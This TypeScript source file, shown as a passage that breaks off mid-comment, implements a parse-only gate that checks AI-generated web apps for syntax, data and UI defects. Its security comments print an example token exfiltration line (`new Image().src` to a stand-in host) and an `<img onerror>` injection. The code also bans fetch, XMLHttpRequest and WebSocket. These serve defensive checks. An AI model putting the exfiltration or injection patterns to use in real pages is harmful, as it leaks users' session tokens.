import { parse } from 'acorn';
import { KIT_IDS } from './runtime/kits';
import { DATE_TOKEN, resolveDateToken, tokenHorizonDays } from './dateToken';
import { dateShapeOf } from './dateShape';
import { isPersonsDay, statedDays, utcToday, writtenDay } from './statedDates';

/**
 * The quality gate for generated web apps — the replacement for the mini-app path's
 * `tsc` compile gate.
 *
 * It PARSES, it does not EXECUTE. That is a deliberate constraint, not a limitation we
 * settled for: an executing gate (jsdom, headless Chrome) would have to run generated
 * code, and running generated code inside the Saddle binary is precisely the exposure
 * this whole pivot exists to close. Parsing catches the dominant failure — a syntax error
 * that renders a blank white page — with no server, no deploy, and no runtime.
 *
 * Every check is STRUCTURAL and provable from the source, for the same reason
 * `hasStyleSheetCreateCall` is structural: a false positive here sends the repair loop to
 * rewrite a working app, which is worse than under-flagging. Anything that would require
 * judging taste or layout is left to on-device review instead.
 */
export interface WebAppGateResult {
  ok: boolean;
  diagnostics: string[];
  /**
   * A stable id for each diagnostic, index for index — `rules[i]` names the check that
   * wrote `diagnostics[i]`.
   *
   * The diagnostics themselves cannot be counted: they are prose for the model, they carry
   * the app's own names, and every one of them opens with a LOCATION, which is `1:1` for
   * nearly all. Grouping rejections by that prefix put every rule in one bucket, so the log
   * that exists to say which rules the model breaks most could not say it. These ids never
   * reach the model; they are for counting.
   */
  rules: string[];
}

interface Node {
  type: string;
  [key: string]: unknown;
}

/** Every <script> body in the fragment, concatenated with their offsets preserved. */
function extractScripts(appCode: string): { code: string; startLine: number }[] {
  const out: { code: string; startLine: number }[] = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let match: RegExpExecArray | null;
  while ((match = re.exec(appCode)) !== null) {
    const before = appCode.slice(0, match.index);
    out.push({ code: match[1], startLine: before.split('\n').length });
  }
  return out;
}

function walk(node: unknown, visit: (n: Node) => void): void {
  if (!node || typeof node !== 'object') return;
  if (Array.isArray(node)) {
    for (const child of node) walk(child, visit);
    return;
  }
  const n = node as Node;
  if (typeof n.type === 'string') visit(n);
  for (const key of Object.keys(n)) {
    if (key === 'type' || key === 'loc' || key === 'range') continue;
    walk(n[key], visit);
  }
}

/** `S.store(...)` / `S.on(...)` — the member call shape the runtime exposes. */
function isSaddleCall(n: Node, method: string): boolean {
  if (n.type !== 'CallExpression') return false;
  const callee = n.callee as Node | undefined;
  if (!callee || callee.type !== 'MemberExpression') return false;
  const obj = callee.object as Node | undefined;
  const prop = callee.property as Node | undefined;
  return !!obj && !!prop && obj.type === 'Identifier' && (obj as { name?: string }).name === 'S'
    && prop.type === 'Identifier' && (prop as { name?: string }).name === method;
}


/**
 * Colour literals written into the app's own CSS.
 *
 * The kits exist so an app never has to pick a colour: every surface, ink and accent is a
 * token that also has a dark-mode value. A hardcoded hex paints over the kit the app just
 * chose — a community-classes app picked `soft` and then covered it in purple gradients —
 * and it cannot respond to `prefers-color-scheme`, so the app is unreadable in dark mode.
 *
 * Neutral rgba() is allowed: a translucent black or white overlay is not a hue and cannot
 * fight the palette. Anything with an actual colour in it is provably a decision the kit
 * had already made.
 */
function hardcodedColours(appCode: string): string[] {
  const styles = [...appCode.matchAll(/<style\b[^>]*>([\s\S]*?)<\/style>/gi)].map((m) => m[1]).join('\n');
  if (!styles.trim()) return [];
  const found = new Set<string>();

  for (const m of styles.matchAll(/#[0-9a-fA-F]{3,8}\b/g)) found.add(m[0]);

  for (const m of styles.matchAll(/\b(rgba?|hsla?)\(([^)]*)\)/gi)) {
    const fn = m[1].toLowerCase();
    const parts = m[2].split(',').map((p) => p.trim());
    if (fn.startsWith('hsl')) {
      // Saturation is the second channel; 0% is grey and harmless.
      const sat = parseFloat(parts[1] ?? '0');
      if (Number.isFinite(sat) && sat > 0) found.add(m[0]);
      continue;
    }
    const [r, g, b] = parts.slice(0, 3).map((p) => parseFloat(p));
    if ([r, g, b].every(Number.isFinite) && !(r === g && g === b)) found.add(m[0]);
  }

  return [...found].slice(0, 4);
}

export interface GateOptions {
  /** The plan said visitors submit to the owner. An app like that with no S.submit call
   *  keeps every reply in the visitor's own browser, so the owner receives nothing — and
   *  it LOOKS like it works, which is why it has to be refused rather than warned about. */
  mustCollect?: boolean;
  /**
   * This app is ALREADY LIVE and is being moved onto the current runtime, not built.
   *
   * A migration and a build are judged for different things. A build can be sent back to
   * the model, so the gate holds it to everything it should be. A live app cannot: refusing
   * it does not improve it, it strands it — the page keeps the CSS the rule objected to AND
   * misses every runtime fix since, permanently, because each new rule can only add to the
   * set of apps nothing will ever move again. Three published apps were already stuck this
   * way on a contrast rule written after they were built.
   *
   * So a migration is checked for what would leave the page broken, and not for what would
   * merely have made it better. It is not a lower standard; it is the standard that applies
   * to a page that is already in front of people.
   */
  migrating?: boolean;
  /**
   * The look the person picked in the design step (`plan.kitId`), for a build.
   *
   * The plan tells the model "call S.kit('<kitId>') — the user picked it", and then the gate
   * gave the LAST word: a build that forgot S.kit was told to "choose the identity that fits
   * the subject, e.g. S.kit('ledger')", and a build that picked a different kit was waved
   * through. So the repair round — the instruction the model follows most closely — could
   * replace the person's choice with the first kit in a list. With this set, every kit
   * diagnostic names their kit, and a different known kit is refused.
   *
   * Only a KNOWN id counts: telling the model to call a kit the gate itself rejects would
   * be a repair that can never succeed. Migrations never pass it — a live app is not
   * refused over its look.
   */
  kitId?: string;
  /**
   * The look an app being EDITED already has. A dropped or misspelled S.kit is repaired to
   * "keep it, or if the change asks for a different look, one of: …" rather than to whatever
   * the subject suggests, because an edit must not reshuffle an app somebody has already
   * shared. Unlike `kitId` it does not refuse a different known kit, and the repair does not
   * name the old one alone: the edit may be the person asking for a new look, and steering
   * it back would undo their edit while reporting success.
   */
  currentKitId?: string;
  /**
   * The app as it is stored, for an EDIT — what the change is being made to.
   *
   * The seeded-row date rules (seed-end-before-start, seed-date-past-offset, and the horizon
   * on written-out dates) judge only the dates an edit WROTE: a date an unchanged row still
   * has is skipped. Review of 2026-09-29 found that without this an app already live with the
   * cafe's '+3w mon' … '+3w sun' or a rota's '-2d 07:00' had its next unrelated edit ("make
   * the header green") refused until the model rewrote starting rows the edit prompt tells it
   * to keep exactly as they are. Those rows were written once, into an empty collection, when
   * the app was first published; the owner's data has long since replaced them, and refusing
   * the edit changes nothing on the page except that the person cannot edit it.
   *
   * It is also a record of the person's dates: a written-out day a row already holds here is
   * theirs for that row when the edit moves it (`keptDays`) — "move the ceremony to 5pm".
   *
   * A build never passes it, so a build is judged on every row it writes.
   */
  currentSource?: string;
  /**
   * What the person asked for, as text — the build's goal and the plan fields the person can
   * edit; an edit's instruction as well (`requestText`, statedDates.ts). Not the planner's rules
   * window, which is dates it chose — though the editable fields start as the planner's text
   * too, and are read whether or not the person changed them (see `requestText` for why).
   *
   * It is how the gate tells a date the person GAVE from one the model invented. A written-out
   * S.list date is exempt from the sample horizon only when this names its day: the gate used
   * to trust the form, and review (2026-09-29) showed a sample timetable refused for '+1d' …
   * '+5d' could be "repaired" into '2026-09-30 09:00' … '2026-10-04 09:00' and pass. Absent,
   * nothing is the person's, so every upcoming written-out date is held to the horizon — the
   * strict reading, and the one that cannot let a stale sample through.
   */
  request?: string;
  /** The moment written-out dates are judged against. Tests pin it; everything else omits it. */
  now?: Date;
}

/**
 * Checks that judge how the page LOOKS rather than whether it works.
 *
 * The distinction only matters for a migration (see `migrating`). Everything not listed
 * here — a page that cannot parse, a form that saves nowhere, a call to something the
 * runtime does not have — applies to every app every time.
 */
function cosmetic(options: GateOptions): boolean {
  return !options.migrating;
}

export function gateWebApp(appCode: string, options: GateOptions = {}): WebAppGateResult {
  const diagnostics: string[] = [];
  const rules: string[] = [];
  /** Every finding goes through here, so a diagnostic cannot exist without its rule id. */
  const flag = (rule: string, message: string) => {
    rules.push(rule);
    diagnostics.push(message);
  };

  // A response cut off by the token cap ends mid-file, and the parse error that follows
  // ("Unexpected end of input") tells the model nothing about what actually happened — it
  // then burns repair rounds rewriting a file that was fine but incomplete. Name it.
  //
  // It asked for the whole app again. Repairs come back as blocks now (generateWebApp.ts,
  // refine.ts), and the whole app again is the one long answer Replicate interrupts at ~140s:
  // what is missing is the end, so the end is what is asked for.
  const openTags = (appCode.match(/<script\b[^>]*>/gi) ?? []).length;
  const closeTags = (appCode.match(/<\/script>/gi) ?? []).length;
  if (openTags > closeTags) {
    return {
      ok: false,
      rules: ['script-never-closed'],
      diagnostics: [
        '1:1 The app is incomplete — a <script> block is never closed, so the response was cut ' +
          'off before it finished. Write the missing end, through the closing </script>, and ' +
          'keep it tighter: fewer seeded rows, shorter comments, no repetition.',
      ],
    };
  }

  const scripts = extractScripts(appCode);

  if (scripts.length === 0) {
    return {
      ok: false,
      rules: ['script-missing'],
      diagnostics: [
        '1:1 This app has no <script> block, so it has no behavior at all. Add a <script> that ' +
          'seeds data with S.store(...) and defines function render().',
      ],
    };
  }

  // --- Syntax. A syntax error is a blank white page, so nothing else is worth checking.
  const programs: Node[] = [];
  for (const script of scripts) {
    try {
      programs.push(parse(script.code, { ecmaVersion: 2022, locations: true }) as unknown as Node);
    } catch (err) {
      const e = err as { message?: string; loc?: { line: number; column: number } };
      const line = (e.loc?.line ?? 1) + script.startLine - 1;
      const column = (e.loc?.column ?? 0) + 1;
      const message = (e.message ?? 'Syntax error').replace(/\s*\(\d+:\d+\)\s*$/, '');
      flag('syntax', `${line}:${column} ${message}. The script does not parse, so the page renders blank.`);
    }
  }
  if (diagnostics.length > 0) return { ok: false, diagnostics, rules };

  // --- Structure.
  let definesRender = false;
  let storeCalls = 0;
  let seededRows = 0;
  let seedIsProvable = false;
  const objectSeeds: string[] = [];
  let clickHandlers = 0;
  let submitCalls = 0;
  let cloudCallCount = 0;
  let framesCalls = 0;
  let publicReadCount = 0;
  let badSubmitRow = false;
  let badSubmitEntity = false;
  let kitCall: { present: boolean; id: unknown } = { present: false, id: undefined };
  const banned = new Set<string>();
  const isoRoundTrips: number[] = [];
  const storeNames = new Map<string, number>();
  const mutatingHandlers: number[] = [];
  const emptySubmitFields = new Set<string>();
  const mislabelledFields = new Set<string>();

  for (const program of programs) {
    walk(program, (n) => {
      if (n.type === 'FunctionDeclaration') {
        const id = n.id as { name?: string } | undefined;
        if (id?.name === 'render') definesRender = true;
      }
      if (n.type === 'AssignmentExpression') {
        const left = n.left as Node | undefined;
        if (left?.type === 'MemberExpression') {
          const obj = left.object as { name?: string } | undefined;
          const prop = left.property as { name?: string } | undefined;
          if (obj?.name === 'window' && prop?.name === 'render') definesRender = true;
        }
      }
      /*
       * `new Date(v).toISOString()` is a render-killer, and it reads as harmless.
       *
       * A wedding RSVP wrote `S.fmt.date(toDate(ev.when).toISOString(), …)` — converting a
       * value to a Date and straight back to a string, just to hand it to a formatter that
       * parses raw values itself. When `v` cannot be parsed, `toISOString` throws
       * "RangeError: Invalid time value" and takes the whole render with it: the app showed
       * "This app hit an error" and nothing else, on first load.
       *
       * `new Date().toISOString()` with NO argument is the legitimate way to stamp "now",
       * so only the form with an argument is refused.
       */
      if (n.type === 'CallExpression') {
        const callee = n.callee as { type?: string; property?: { name?: string }; object?: Node } | undefined;
        if (callee?.type === 'MemberExpression' && callee.property?.name === 'toISOString') {
          const target = callee.object as { type?: string; arguments?: Node[]; loc?: { start?: { line: number } } } | undefined;
          if (target?.type === 'NewExpression' && (target.arguments?.length ?? 0) > 0) {
            isoRoundTrips.push((n.loc as { start?: { line: number } } | undefined)?.start?.line ?? 1);
          }
        }
      }
      if (isSaddleCall(n, 'store')) {
        storeCalls++;
        /*
         * The same collection seeded twice: the FIRST seed wins and the real one is lost.
         *
         * A wedding RSVP wrote `S.store('rsvp-draft', [])[0] || null` on one line and
         * `S.store('rsvp-draft', [{…the actual draft…}])` on the next. The first call
         * persisted `[]`; the second found the key already there, loaded the empty array,
         * and threw the real seed away. `all()[0]` was undefined forever, so every render
         * of the reply screen died on `d.name` and the app showed an error instead of a
         * form. Nothing about either line looks wrong on its own.
         */
        const storeName = (n.arguments as Node[] | undefined)?.[0] as { value?: unknown } | undefined;
        if (typeof storeName?.value === 'string') {
          const at = (n.loc as { start?: { line: number } } | undefined)?.start?.line ?? 1;
          if (!storeNames.has(storeName.value)) storeNames.set(storeName.value, at);
          else storeNames.set(`${storeName.value}\u0000${at}`, at);
        }
        const args = n.arguments as Node[] | undefined;
        const seed = args?.[1];
        // Only a LITERAL array proves how many rows are seeded. `S.store('bills',
        // seedBills())` is perfectly good code whose row count is not knowable
        // statically — flagging it rejected a working app and cost a repair round on a
        // real build, which is the exact false-positive this gate is supposed to refuse
        // to make. Unprovable means unflagged.
        if (seed === undefined) {
          seedIsProvable = true; // no seed at all IS provable, and it is thin
        } else if (seed.type === 'ArrayExpression') {
          seedIsProvable = true;
          const elements = (seed.elements as unknown[] | undefined) ?? [];
          seededRows = Math.max(seededRows, elements.length);
        } else if (seed.type === 'ObjectExpression') {
          // A collection is a LIST. `S.store('x', {})` is provably wrong the same way a
          // missing seed is, and it used to reach the browser and blank the page — so it
          // belongs here rather than in the "unprovable, unflagged" bucket above.
          objectSeeds.push(String((args?.[0] as { value?: unknown } | undefined)?.value ?? '?'));
        }
      }
      if (isSaddleCall(n, 'kit')) {
        const args = n.arguments as Node[] | undefined;
        kitCall = { present: true, id: (args?.[0] as { value?: unknown } | undefined)?.value };
      }
      if (isSaddleCall(n, 'cloud')) cloudCallCount++;
      if (isSaddleCall(n, 'frames')) framesCalls++;
      if (isSaddleCall(n, 'ai')) { /* S.ai.* reads as a member call; counted below. */ }
      if (isSaddleCall(n, 'list') || isSaddleCall(n, 'seats')) publicReadCount++;
      if (isSaddleCall(n, 'submit')) {
        submitCalls++;
        const args = (n.arguments as Node[] | undefined) ?? [];
        if (typeof (args[0] as { value?: unknown } | undefined)?.value !== 'string') badSubmitEntity = true;
        if (args[1]?.type !== 'ObjectExpression') badSubmitRow = true;
        /*
         * A field sent as a hardcoded empty string.
         *
         * A food-bank signup collected a name, a phone number and "can you drive", then
         * sent `email: ''` alongside them — because the shape in the guidance shows an
         * email. The organiser gets a column that is blank in every row, and it looks like
         * data that failed to save rather than a question never asked. Omit the field.
         */
        if (args[1]?.type === 'ObjectExpression') {
          for (const prop of ((args[1] as { properties?: Node[] }).properties ?? [])) {
            const pr = prop as unknown as { key?: { name?: string; value?: unknown }; value?: { type?: string; value?: unknown } };
            const key = pr.key?.name ?? (typeof pr.key?.value === 'string' ? pr.key.value : undefined);
            /*
             * A column named after one kind of contact detail, fed from another.
             *
             * A food-bank signup collected a name, a phone number and "can you drive", and
             * submitted the phone as `email: phone`. The organiser's export then has a
             * column headed email full of phone numbers — the data is all there and every
             * row is mislabelled, which is worse than a missing column because it looks
             * right. Same instinct as sending `email: ''`: bending the row to a remembered
             * shape instead of the questions actually asked.
             */
            const from = (pr.value as { type?: string; name?: string } | undefined);
            if (key && from?.type === 'Identifier' && from.name) {
              const CONTACT = [
                { field: /^e-?mail$/i, source: /^(phone|tel|mobile|number)$/i },
                { field: /^(phone|tel|mobile)$/i, source: /^e-?mail$/i },
              ];
              for (const { field, source } of CONTACT) {
                if (field.test(key) && source.test(from.name)) mislabelledFields.add(`${key}: ${from.name}`);
              }
            }
            if (key && pr.value?.type === 'Literal' && pr.value.value === '') {
              emptySubmitFields.add(key);
            }
          }
        }
      }
      if (isSaddleCall(n, 'on')) {
        const args = n.arguments as Node[] | undefined;
        const evt = args?.[1] as { value?: unknown } | undefined;
        if (evt?.value === 'click') {
          clickHandlers++;

          /*
           * A handler that changes state and never re-renders: the state moves, the screen
           * does not.
           *
           * A wedding RSVP wrote `S.on('.evt-yesno', 'click', function (e, node) {
           * draft[key] = node.dataset.val === 'yes'; })` — correct markup, correct
           * three-state value, no render(). So `aria-pressed` stayed as it was and tapping
           * "Yes, I'll be there" did nothing visible. The guest would tap it, see nothing
           * happen, and tap the other one.
           *
           * A store method (add/update/remove/toggle) re-renders by itself, and S.go
           * re-renders, so only a handler that does neither is refused.
           */
          const body = args?.[2];
          if (body) {
            /*
             * What counts as redrawing is wider than calling render().
             *
             * The first version of this rule looked for a bare `render()` and a short list
             * of store methods, and it flagged thirteen live apps — including a cafe rota
             * that works perfectly. Two shapes it misjudged:
             *
             *   S.on('#mine-lookup', 'click', function () {
             *     mineEmail = …;   renderMine();     // a HELPER that redraws
             *   });
             *
             *   errEl.textContent = 'Enter your name.';  // the handler writes the DOM
             *   errEl.style.display = 'block';           // ITSELF — no render needed
             *
             * A rule that refuses working apps costs repair rounds and teaches the model
             * nothing, so both count as redrawing now.
             */
            const REDRAW_FN = /^(render|draw|refresh|update|paint|show|sync|refill|repaint)/i;
            const DOM_TARGET = new Set([
              'textContent', 'innerHTML', 'innerText', 'value', 'checked', 'disabled',
              'hidden', 'className', 'src', 'href', 'style', 'display', 'src', 'title',
            ]);
            let mutates = false;
            let redraws = false;
            walk(body, (h) => {
              if (h.type === 'AssignmentExpression' || h.type === 'UpdateExpression') {
                mutates = true;
                // An assignment straight into the document IS the redraw.
                const left = (h as { left?: Node }).left as
                  | { type?: string; property?: { name?: string }; object?: { property?: { name?: string } } }
                  | undefined;
                if (left?.type === 'MemberExpression') {
                  const prop = left.property?.name ?? '';
                  if (DOM_TARGET.has(prop) || DOM_TARGET.has(left.object?.property?.name ?? '')) redraws = true;
                }
              }
              if (h.type === 'CallExpression') {
                const callee = h.callee as { type?: string; name?: string; property?: { name?: string } } | undefined;
                if (callee?.name && REDRAW_FN.test(callee.name)) redraws = true;
                if (callee?.type === 'MemberExpression') {
                  const prop = callee.property?.name ?? '';
                  if (REDRAW_FN.test(prop)) redraws = true;
                  if (['add', 'remove', 'toggle', 'set', 'save', 'reload', 'go', 'submit', 'then'].includes(prop)) {
                    redraws = true;
                  }
                }
              }
            });
            if (mutates && !redraws) {
              mutatingHandlers.push((n.loc as { start?: { line: number } } | undefined)?.start?.line ?? 1);
            }
          }
        }
      }
      if (n.type === 'Identifier') {
        const name = (n as { name?: string }).name;
        if (name === 'fetch' || name === 'XMLHttpRequest' || name === 'WebSocket') banned.add(name);
      }
    });
  }

  /*
   * A question that arrives already answered.
   *
   * A wedding RSVP rendered all three events with "Not able to" pressed, because its draft
   * initialised each one to `false` and the markup asked `aria-pressed="(draft[k] === false)"`.
   * A guest who tapped send without noticing declined the whole weekend having answered
   * nothing, and the couple could not tell that from a real no.
   *
   * Only a LITERAL `aria-pressed="true"` written into the markup is refused — a pressed
   * state computed from state is how a selected answer is supposed to look, and a
   * pre-selected meal or a default filter is a legitimate choice. This is the form that
   * cannot be anything but an answer nobody gave.
   */
  /*
   * Only in MARKUP, never in a selector.
   *
   * The first version of this counted `.wk-toggle[aria-pressed="true"] { … }` — which is
   * how you style a pressed control, and appears in every app that has a toggle. It flagged
   * five apps whose markup computes the state correctly, which is the opposite of useful.
   * So: style blocks removed first, and an attribute selector's opening bracket excluded.
   */
  const markupOnly = appCode.replace(/<style\b[^>]*>[\s\S]*?<\/style>/gi, '');
  const hardPressed = [...markupOnly.matchAll(/(^|[^[\w-])aria-pressed\s*=\s*("true"|'true')/g)];
  if (hardPressed.length) {
    flag('answer-prepressed', 
      `1:1 ${hardPressed.length} control(s) are written with aria-pressed="true" in the markup, so the ` +
        'question arrives already answered. A wedding RSVP shipped with "Not able to" pressed on all ' +
        'three events: a guest who tapped send without noticing declined the weekend having answered ' +
        'nothing, and the couple could not tell that from a real no. Compute the pressed state from the ' +
        'answer — aria-pressed="\'+ (answer === true) +\'" — so nothing is chosen until somebody chooses it.',
    );
  }

  /*
   * SEC-03. Row content interpolated into markup without S.esc.
   *
   * Content one person typed, rendered in another person's browser: an owner's class
   * description on every visitor's page, a visitor's name in the owner's list. Raw into
   * innerHTML an `<img onerror=…>` runs as the reader — and every published app shares one
   * origin with the reader's session.
   *
   * Reported on a migration as well as a build, unlike the cosmetic rules. The `migrating`
   * leniency exists so a new rule cannot strand a live page that has no way to be fixed —
   * but this one HAS a way: `escapeRowReads` in patches.ts repairs it mechanically. A
   * security defect with a working repair should be named on a live page, not excused.
   */
  const rawRows = unescapedRowReads(appCode);
  if (rawRows.length) {
    const shown = rawRows.slice(0, 4).map((r) => `${r.text} (line ${r.line})`).join(', ');
    flag('unescaped-row-field', 
      `${rawRows[0].line}:1 ${rawRows.length} row field(s) go into markup unescaped — ${shown}. ` +
        'That content was typed by somebody else: an owner writes a description and every visitor ' +
        'renders it; a visitor types a name and the owner renders it. Raw into innerHTML, ' +
        '<img onerror="…"> runs as whoever is reading, beside their session. Wrap each one: ' +
        `S.esc(${rawRows[0].text}).`,
    );
  }

  /*
   * An image the page loads from somebody else's server will not load at all.
   *
   * The published-page CSP allows images from this origin, from our asset bucket, and from
   * data:/blob: — nothing else. Two apps on the older engine path already have a hero
   * `background-image` from images.unsplash.com, and when the policy ships those heroes go
   * blank. No code of ours writes such a URL; the model did, which means any generated app
   * can carry one.
   *
   * We are not widening the policy to fix that. `img-src` is the cheapest exfiltration
   * route there is — `new Image().src = 'https://somewhere/?t=' + token` sends a token in a
   * query string to whoever runs that host, and it needs no fetch, no form and no
   * navigation. So the rule points the other way: generated pages use our own assets.
   *
   * Reported on a migration too, not just a build. It is not cosmetic — the image is
   * simply absent — and an engine-rendered page never reaches here anyway, because
   * `appCodeOf` finds no `<main class="s-scroll">` in one and the audit skips it. Measured
   * before it was written: 0 of 14 local built pages and 0 of the 51 live webapp pages
   * trip it, so it adds nothing to today's fleet and only holds the line for new builds.
   */
  const externalImages = externalImageUrls(appCode);
  if (externalImages.length) {
    const shown = externalImages.slice(0, 3).map((h) => `${h.url} (line ${h.line})`).join(', ');
    flag('external-image', 
      `${externalImages[0].line}:1 ${externalImages.length} image(s) load from another site — ${shown}. ` +
        'The published page is only allowed to load images from Saddle, so this one renders as an ' +
        'empty box with no error anybody can see. Use S.ai.image(...) for a generated picture, or an ' +
        'uploaded asset, or a CSS gradient — never a URL on somebody else’s server.',
    );
  }

  /*
   * Starter rows re-written on every page load. See `reseedsOnEveryLoad`.
   *
   * Reported on a migration too, not only a build: this is somebody's data growing by
   * twelve rows a visit, and an app already published keeps doing it until it is rebuilt.
   * Naming it on a live page is the only way anyone finds out.
   */
  for (const hit of reseedsOnEveryLoad(appCode)) {
    flag('reseeds-every-load', 
      `1:1 '${hit.collection}' is seeded behind a hand-written empty check (${hit.text}) — and ` +
        'that check is true on EVERY page load, because .all() reads a cache the first fetch ' +
        'has not filled yet, so an unloaded collection looks identical to an empty one. The ' +
        'starter rows get written again every single visit. Use S.cloud(name).seed(rows), which ' +
        'waits for that fetch, writes only into a collection known to be empty, writes one row ' +
        'at a time, and never runs twice. Ask .loaded() if you need to show an empty state.',
    );
  }

  if (mislabelledFields.size) {
    flag('submit-field-mislabelled', 
      `1:1 S.submit sends ${[...mislabelledFields].join(', ')} — a field named after one kind of contact ` +
        'detail carrying another. The owner gets a column headed "email" full of phone numbers: the data ' +
        'is all there and every row is mislabelled, which is worse than a missing column because it looks ' +
        'right. Name the field after what this form actually asks for.',
    );
  }

  if (emptySubmitFields.size) {
    flag('submit-field-always-empty', 
      `1:1 S.submit sends ${[...emptySubmitFields].map((f) => `${f}: ''`).join(', ')} — a hardcoded empty ` +
        'string. The owner gets a column that is blank in every row, which reads as data that failed to ' +
        'save rather than a question never asked. Send only the fields this form actually asks for.',
    );
  }

  for (const at of mutatingHandlers) {
    flag('handler-never-redraws', 
      `${at}:1 This click handler changes state and never redraws, so the screen keeps showing the ` +
        'old value. A wedding RSVP set `draft[key] = …` here and left it at that: tapping "Yes, ' +
        'I\'ll be there" changed nothing a guest could see, because aria-pressed still said false. ' +
        'Call render() at the end of the handler. (A store method — add/update/remove/toggle — and ' +
        'S.go already redraw; a plain assignment does not.)',
    );
  }

  // A name recorded twice means a second S.store call for a collection already seeded.
  for (const [name, at] of storeNames) {
    if (!name.includes('\u0000')) continue;
    const collection = name.split('\u0000')[0];
    flag('store-seeded-twice', 
      `${at}:1 S.store('${collection}', …) is called more than once. Only the FIRST seed is ever ` +
        'used — the collection is persisted on that call, so every later call loads what is already ' +
        'stored and throws its own seed away. Seeding it empty first and properly second leaves the ' +
        'collection permanently empty, and `all()[0]` is then undefined in every render. Call ' +
        `S.store('${collection}', …) once, keep the handle it returns, and use that everywhere.`,
    );
  }

  /*
   * Every owner-managed row needs an id it declares itself.
   *
   * The server assigns an id to any row that arrives without one, and that id is a nanoid
   * nobody can predict — so an app whose seed rows have no ids has nothing stable to
   * reference them by, and three separate failures came from exactly that. A supper club
   * lost which night a booking was for. A community centre linked sessions to classes by
   * '__seed1'…'__seed4' and every class read "No upcoming sessions". A food-bank drive
   * submitted `shiftId: 'morning-sorting'`, a slug of the name, which matches no stored
   * shift at all — the organiser cannot join a signup back to the shift it is for.
   *
   * An explicit id costs one short string per row and makes every reference hold.
   */
  for (const [entity, rows] of Object.entries(listStartingRows(appCode))) {
    const missing = rows.filter((r) => typeof r.id !== 'string' || !r.id).length;
    if (!missing) continue;
    flag('seed-row-without-id', 
      `1:1 ${missing} of the ${rows.length} rows seeded into '${entity}' declare no id. The server ` +
        'gives an unidentified row an id of its own choosing, so nothing in the app can reference ' +
        `these rows afterwards — a submission that says which '${entity}' it is for, or a detail ` +
        `screen opened by id, has nothing to match. Give every row a short explicit id, e.g. ` +
        `{ id: 'morning-sorting', … }.`,
    );
  }

  /**
   * Whether an EDIT left these values of a row exactly as the stored app has them — same row
   * (by id, when it has one), same fields, same values. See `GateOptions.currentSource`: the
   * seeded-row date rules judge what an edit wrote, not the rows it was told to keep. By value
   * rather than by row, so an edit that renames a row keeps its dates without being told to
   * rewrite them. Always false for a build.
   */
  const storedRows = options.currentSource === undefined ? null : listStartingRows(options.currentSource);
  const untouched = (entity: string, row: Record<string, unknown>, fields: string[]): boolean =>
    !!storedRows?.[entity]?.some(
      (was) => (typeof row.id !== 'string' || was.id === row.id) && fields.every((f) => was[f] === row[f]),
    );
  /**
   * The written-out days this row already had in the stored app — the same row, by id (or, for
   * a row with no id, any row of its collection, as `untouched` reads one). See the horizon rule
   * below: a day a stored row holds already passed a gate, so an edit that moves the row near it
   * is moving the person's date, not inventing one. Empty for a build.
   */
  const keptDays = (entity: string, row: Record<string, unknown>): number[] =>
    (storedRows?.[entity] ?? [])
      .filter((was) => typeof row.id !== 'string' || was.id === row.id)
      .flatMap((was) => Object.values(was).map((v) => (typeof v === 'string' ? writtenDay(v) : null)))
      .filter((d): d is number => d !== null);
  /**
   * How far an edit moved a collection's stored days, when it moved them all by ONE amount — each
   * field of each row that kept its id, from the day it held to the day it holds now, by whole
   * days so a new start time on one of them ("and make the ceremony 5pm") is still the same move.
   * Null when nothing moved, or when rows moved by different amounts. See the horizon rule: this is
   * what lets "push everything back two weeks" keep a wedding the week window cannot reach.
   */
  const movedBy = (entity: string, rows: Record<string, unknown>[]): number | null => {
    const shifts = new Set<number>();
    for (const row of rows) {
      if (typeof row.id !== 'string') continue;
      const was = storedRows?.[entity]?.find((w) => w.id === row.id);
      if (!was) continue;
      for (const [field, value] of Object.entries(row)) {
        const from = typeof was[field] === 'string' ? writtenDay(was[field] as string) : null;
        const to = typeof value === 'string' ? writtenDay(value) : null;
        if (from !== null && to !== null && to !== from) shifts.add(to - from);
      }
    }
    return shifts.size === 1 ? [...shifts][0] : null;
  };

  /*
   * A seeded schedule that runs out within the month is an empty page a month from now.
   *
   * The acute version shipped first: a food-bank drive seeded four shifts as '+0d 08:00' …
   * '+0d 19:30', and an app built at ten at night opened with its whole schedule already
   * past. The rule that caught it fired on '+0d' ALONE — and so it missed the chronic
   * version, which is the same defect on a slower clock: food-bank-shifts seeded '+1d' …
   * '+5d', sailed straight through, and was an empty board five days later. A production
   * census found 14 of 15 dated collections already holding only past rows.
   *
   * Starting rows are DEMO content — the owner's real dates replace them — so they have to
   * look alive whenever the app is next opened, not only on build day. The furthest seeded
   * date is the demo's shelf life, so it must clear a comfortable margin: a schedule whose
   * latest sample date is still within a month will be empty within a month.
   *
   * Two things keep this off legitimate apps. A SINGLE dated event is exempt (`< 2` tokens)
   * — a launch, one wedding day, a single deadline is allowed to be near and then to pass;
   * only a repeating schedule is expected to stay populated. And the check is the MAX across
   * the collection, so seeding one already-past row to show a page's "finished" styling is
   * fine as long as later rows reach past the horizon.
   *
   * A date the PERSON gave is not a sample, and it stays exactly where they put it however
   * near it is. The diagnostic used to tell every refused schedule to move "the furthest at
   * least six weeks out", and on 2026-09-29 a wedding described as June 11-13, 2027 — first
   * seeded as '+2w fri' tokens — was repaired to the letter: Fri 13 to Sun 15 November, under
   * a page that still said June. Told to "seed exactly one date that has already gone", a
   * cafe's list of opening-week offers also grew a "preview tasting … thanks to everyone who
   * came" that never happened. So the repair now says which dates are the person's and keeps
   * them, and asks for a past row only where one belongs.
   *
   * Which dates are the person's is decided by what they ASKED FOR, not by the form. At first
   * every written-out date was exempt, and review (2026-09-29) showed what that let through: a
   * sample timetable refused for '+1d' … '+5d' "repaired" into '2026-09-30 09:00' …
   * '2026-10-04 09:00' passes, and is an empty page a week later. So a written-out date is
   * exempt only when the request (`options.request`) names its day, or one within a week of
   * it (statedDates.ts); any other upcoming one is a sample and counts toward the horizon as a
   * token does. One that has already gone does not count: it is a finished row, or a post, a
   * result, a changelog entry — content dated in the past by nature, and never "upcoming".
   *
   * On an edit, what the person asked for is not the only record of their dates: the stored
   * app is another. Review of 2026-09-29 found a wedding whose dates came from an EARLIER edit,
   * under a goal of "a wedding website": on 2027-05-28 "move the ceremony to 5pm" rewrote
   * '2027-06-12 16:00' to '17:00', nothing it was asked named June 12, and the refusal told
   * the model to write the weekend as relative tokens — the wedding bug again. So a day a row
   * already held in the stored app (`keptDays`) is the person's for THAT row, within the same
   * week either side: the ceremony at 5pm, or the whole weekend a week later. Only for that
   * row, not for the app: review's first reading, every stored day for every row, let a sample
